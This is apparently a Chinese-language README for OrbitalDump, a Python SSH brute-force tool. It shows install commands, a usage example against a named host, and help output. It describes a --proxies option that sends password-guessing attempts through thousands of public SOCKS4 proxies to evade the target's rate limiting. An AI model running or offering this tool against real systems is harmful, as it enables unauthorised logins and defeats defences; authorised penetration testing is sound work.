一个用Python编写的简单多线程分布式SSH暴力破解工具。

当脚本在没有 --proxies 开关的情况下执行时,它的行为与任何其他多线程SSH暴力破解脚本一样。当添加了 --proxies 开关时,脚本会从 ProxyScrape 获取一个(通常是数千个)SOCKS4代理列表,并通过这些SOCKS4代理发起所有暴力破解攻击,这样暴力破解尝试就不太可能被目标主机限制速率。
你可以通过pip安装OrbitalDump。
pip install -U --user orbitaldump
orbitaldump
或者,你可以克隆此仓库并直接运行源代码。
git clone https://github.com/k4yt3x/orbitaldump.git
cd orbitaldump
python -m orbitaldump
下面展示了一个简单的用法。下面的命令:
-t 10:启动10个暴力破解线程-u usernames.txt:从usernames.txt读取用户名(每行一个用户名)-p passwords.txt:从passwords.txt读取密码(每行一个密码)-h example.com:将暴力破解目标设置为 example.com--proxies:通过ProxyScrape的代理发起攻击python -m orbitaldump -t 10 -u usernames.txt -p passwords.txt -h example.com --proxies
你可以通过执行带有 --help 开关的OrbitalDump来获取完整用法。下面的部分可能已经过时。
usage: orbitaldump [--help] [-t THREADS] [-u USERNAME] [-p PASSWORD] -h HOSTNAME [--port PORT] [--timeout TIMEOUT] [--proxies]
optional arguments:
--help show this help message and exit
-t THREADS, --threads THREADS
number of threads to use (default: 5)
-u USERNAME, --username USERNAME
username file path (default: None)
-p PASSWORD, --password PASSWORD
password file path (default: None)
-h HOSTNAME, --hostname HOSTNAME
target hostname (default: None)
--port PORT target port (default: 22)
--timeout TIMEOUT SSH timeout (default: 6)
--proxies use SOCKS proxies from ProxyScrape (default: False)